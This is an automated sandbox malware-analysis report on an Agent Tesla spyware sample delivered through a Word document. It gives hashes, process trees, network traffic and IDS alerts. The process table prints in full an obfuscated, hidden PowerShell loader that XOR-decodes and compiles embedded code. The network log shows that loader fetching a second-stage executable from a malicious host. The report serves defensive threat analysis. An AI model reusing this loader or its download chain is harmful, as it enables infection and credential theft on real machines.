File name: | Sample1.zip |
Full analysis: | https://app.any.run/tasks/a549cf45-5e21-4305-a3a6-5f9532d07375 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | August 13, 2019, 15:27:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 68C412B442347675E074F1F99FEA14BB |
SHA1: | 57C43BB8140ED2802815E98822843563F456EC78 |
SHA256: | 71B59F2CAF632375CB44B0A8765D9AA094629254C0564FB316BFA2660282B137 |
SSDEEP: | 768:pVF1caFXHHfZWTcEFTZ5gQ7TbGoLkMFnk:DcSHhB8Z5gcb1wMFk |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin |
---|---|
ZipUncompressedSize: | 39182 |
ZipCompressedSize: | 36225 |
ZipCRC: | 0x322c05c7 |
ZipModifyDate: | 2019:08:13 15:25:26 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2900 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3164 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
492 | powershell -WindowStyle Hidden function md293 { param($fc9bf9) $d7b938 = 's3a8d65';$a8bf975 = ''; for ($i = 0; $i -lt $fc9bf9.length; $i+=2) { $c13d2b = [convert]::ToByte($fc9bf9.Substring($i, 2), 16); $a8bf975 += [char]($c13d2b -bxor $d7b938[($i / 2) % $d7b938.length]); } return $a8bf975; } $r3edcbb = '064008560316660a40155d090d40005a0f5f44654c004704554a64401d47085501187c1d47044a0b466616411751075346484612510a5115204a124c015b1b375a005f0a5946075a024b5f43461a5d0618374f4607560c162d790e064008560316660a40155d09187b16475a356e4640115f085b4455591240121800040110501a63205a593a5e115716421d5158044a0a535940014314215841014a31570d58414e11265d1066471c50205c0044500040431139164506510d51071646075215510716500b47044a0a167c1d47314c16164d4502560e4c7f5b0763154a44570216500509531a460741085603165e4107500e06551c48682554087f58035c134c4c145e16410f5d080507511f417d0a42470a630e510a42154e1343740b57513f5a034a05444c511a3c181443571f5a0218174254075a0218014e4116410f182d5841234713180053061650494b10445c1d544159525451471a5a63205a593a5e115716421d5158044a0a53594001431444735b074118680b5f5b070e436e0d444106520d681659411650151a4d6b15034603540d55150047004c0d5515164b155d165815115c0e54444c034006005c4c7f5b0763154a4450574656545c5c1a603a5d15681044151906075b025719534608561016511657050f071a151c461518115f5b0713125a575400121a5a63205a593a5e115716421d5178044a0a535940014f5c085a175f13245610444c235c0856100b1721470d750b40503e560c57164f175f13325d107a540047244a1659474e55005417531c2e13124c05425c101304401053471d1317570d52151751590a0755515b7a0f4c3442475347540b020354101f285610664101130d0e570401110b4d510a42151105020056071c4843145a085f5653401559105f56535a0f4c445d54405753104d4d7c1d47314c1616471652530f0100154e13055d5753565b5e050a5d051d5102530d010707460255595104004a02071a4d1f0e1a55494a01570744565705597f5b0763154a4a6c50015c48430359411c13160f06550d484e28561066410113065e5c0750470b5c40520702451b135d05040216054d5500040c401b430b56035042015409570100460655090001044207545d5404004007561a4d1f0e1a55495f020e0416075905597f5b0763154a4a6c50015c48430359411c13160f06550d484e34710a426507414141535757410757054c637c1d47314c161f004846085610164744075401530b05485a0710454c034006005c4c51534b02040c5c1a4c4452030a500019434b55084859400713130f50030c441a48430359411c13160f06550d484e234110536e2e13160b0755514e485140570719434b075e48064d4a031c032d584123471318120f0c10555305295747005b00544a77591f5c0270235a5a11520d10571f0e3e52134b0c57595d700e481d1e424050025c480619050a585b020419401a5a5c060e07105005100a5342537a0f4c3442475b5407005553014b1d35572d5841450749114f064d4303505a4d1a434a0a025e561a065a08160f06550d4913365d0675591a560f4c445354475207050a53425364045a275a5c165d15104d0d460741085603164d4107590d520b701d45084a0b5858165d1516235341355c0d5c014465124709102158431a410e5609535b071d324801555c125f2757085250011d2048145a5c105215510b5871124700114f14692f4a030a52025751180c5c560f065b11545c5100044a06051a4d0d501207005e4a725a045d0d570552731a5f04100952074a00491a5554014402540c5c0350420a50595501004b07020c050602420b540e5555001607040d560702420a560e55550010030509510505470054085152004502580d00141c5f4b530c5c03035a08314a0b55500040324c0544413a5d0757445e53150052050a5342536313570753460060155916427c1d550e101c04014b0657115f66471c50044b1718660752134c4c5e53150052115f44500746135644060e0e43145a085f5653401559105f565340154a0d5852535e050a5d051d004713510a51150001520d051f4e004713510a51151204045b0007024e11120b050e51450643031742471a5d061800530616505c6b10445c1d544f7d0946410a080757161e5c1d47415159060e1a0f120a5703545d7f045603425d485a4a05561f4e114a155d444e034204570527595b0556134c4a625a314a155d4c450740060016374357004713510a511d1a1f53114807035a08055d575356580e495b0c57475a1b190e550103536d4159535356170256634c5f1a411a411d44570216500509531879165d064c0c6b1c484e135d1043471d13055d575356484e1c'; $r3edcbb2 = md293($r3edcbb); Add-Type -TypeDefinition $r3edcbb2; [d24cc]::ka3d2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WmiPrvSE.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\df5laeek.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
4080 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES746A.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7459.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3672 | "C:\Users\admin\AppData\Roaming\yb264b.exe" | C:\Users\admin\AppData\Roaming\yb264b.exe | — | powershell.exe |
User: admin Company: inigujesekaquguxol Integrity Level: MEDIUM Description: apigomir Exit code: 0 Version: 7.11.14.18 | ||||
3192 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Roaming\yb264b.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | yb264b.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2324 | "C:\Program Files\Opera\opera.exe" | C:\Program Files\Opera\opera.exe | explorer.exe | |
User: admin Company: Opera Software Integrity Level: MEDIUM Description: Opera Internet Browser Version: 1748 | ||||
3788 | C:\Users\admin\AppData\Roaming\yb264b.exe | C:\Users\admin\AppData\Roaming\yb264b.exe | yb264b.exe | |
User: admin Company: inigujesekaquguxol Integrity Level: MEDIUM Description: apigomir Version: 7.11.14.18 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2900 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2900.11024\b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin | — | |
MD5:— | SHA256:— | |||
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR65D2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5NB67R8KW0KEEWGW118.temp | — | |
MD5:— | SHA256:— | |||
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC7459.tmp | — | |
MD5:— | SHA256:— | |||
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.pdb | — | |
MD5:— | SHA256:— | |||
4080 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES746A.tmp | — | |
MD5:— | SHA256:— | |||
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.dll | — | |
MD5:— | SHA256:— | |||
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.out | — | |
MD5:— | SHA256:— | |||
2324 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\oprCE0.tmp | — | |
MD5:— | SHA256:— | |||
2324 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\oprD20.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2324 | opera.exe | GET | — | 162.144.12.172:80 | http://dk-rc.com/ | US | — | — | malicious |
2324 | opera.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/js/ | US | html | 1.26 Kb | malicious |
492 | powershell.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/js/Cool-Tue.exe | US | executable | 674 Kb | malicious |
2324 | opera.exe | GET | 200 | 93.184.220.29:80 | http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl | US | der | 528 b | whitelisted |
2324 | opera.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/favicon.ico | US | html | 1.21 Kb | malicious |
2324 | opera.exe | GET | 400 | 185.26.182.111:80 | http://sitecheck2.opera.com/?host=dk-rc.com&hdn=a9uiBCn4kkak4gCnM6qj0g== | unknown | html | 150 b | whitelisted |
3788 | yb264b.exe | GET | 200 | 18.204.189.102:80 | http://checkip.amazonaws.com/ | US | text | 12 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
492 | powershell.exe | 162.144.12.172:80 | dk-rc.com | Unified Layer | US | suspicious |
2324 | opera.exe | 185.26.182.111:80 | sitecheck2.opera.com | Opera Software AS | — | whitelisted |
2324 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3788 | yb264b.exe | 18.204.189.102:80 | checkip.amazonaws.com | — | US | shared |
2324 | opera.exe | 185.26.182.93:443 | certs.opera.com | Opera Software AS | — | whitelisted |
3788 | yb264b.exe | 64.37.54.190:587 | mail.middleeast-ins.com | HostDime.com, Inc. | US | unknown |
2324 | opera.exe | 162.144.12.172:80 | dk-rc.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
dk-rc.com |
| malicious |
certs.opera.com |
| whitelisted |
crl4.digicert.com |
| whitelisted |
sitecheck2.opera.com |
| whitelisted |
checkip.amazonaws.com |
| shared |
mail.middleeast-ins.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
492 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
492 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3788 | yb264b.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
3788 | yb264b.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|